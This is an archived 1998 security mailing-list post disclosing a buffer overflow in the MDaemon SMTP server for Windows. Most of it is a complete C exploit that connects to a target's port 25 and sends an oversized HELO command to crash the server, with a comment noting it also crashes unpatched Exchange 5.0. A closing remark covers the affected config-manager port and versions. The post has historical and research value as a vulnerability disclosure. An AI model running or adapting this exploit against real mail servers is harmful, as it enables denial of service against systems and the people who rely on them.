MDaemon SMTP Server Buffer Overflow's

Aleph One (aleph1@DFW.NET)
Wed, 11 Mar 1998 00:44:45 -0600

[ forwarded from rootshell ]

Since a similar bug was just released about the MDaemon Config Manager on
Bugtraq, we decided to release our MDaemon exploit early. After the exploit
you will find the original Bugtraq post. Note that MDaemon has known about
this bug since February. Look for our upcoming paper on SMTP server
security.

/*
* MDaemon SMTP server for Windows buffer overflow exploit
*
* http://www.mdaemon.com - if you dare...
*
* Tested on MDaemon 2.71 SP1
*
* http://www.rootshell.com/
*
* Released 3/10/98
*
* (C) 1998 Rootshell All Rights Reserved
*
* For educational use only. Distribute freely.
*
* Note: This exploit will also crash the Microsoft Exchange 5.0 SMTP mail
* connector if SP2 has NOT been installed.
*
* Danger!
*
* A malicous user could use this bug to execute arbitrary code on the
* remote system.
*
*/

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

void main(int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *hp;
char *buffer;
int sock, i;

if (argc != 2) {
printf("usage: %s <smtp server>\n", argv[0]);
exit(1);
}
hp = gethostbyname(argv[1]);
if (hp==NULL) {
printf("Unknown host: %s\n",argv[1]);
exit(1);
}
bzero((char*) &sin, sizeof(sin));
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(25);
sock = socket(AF_INET, SOCK_STREAM, 0);
connect(sock,(struct sockaddr *) &sin, sizeof(sin));
buffer = (char *)malloc(10000);
sprintf(buffer, "HELO ");
for (i = 0; i<4096; i++)
strcat(buffer, "x");
strcat(buffer, "\r\n");
write(sock, &buffer[0], strlen(buffer));
close(sock);
free(buffer);
}

-- cut here --

Rootshell Note: The config manager appears to run on port 8081 and is
configurable. In the version that we tested (2.71 SP1) this buffer overflow
did not exist in the remote config manager, and required a remote version of
3.7 and not 3.0.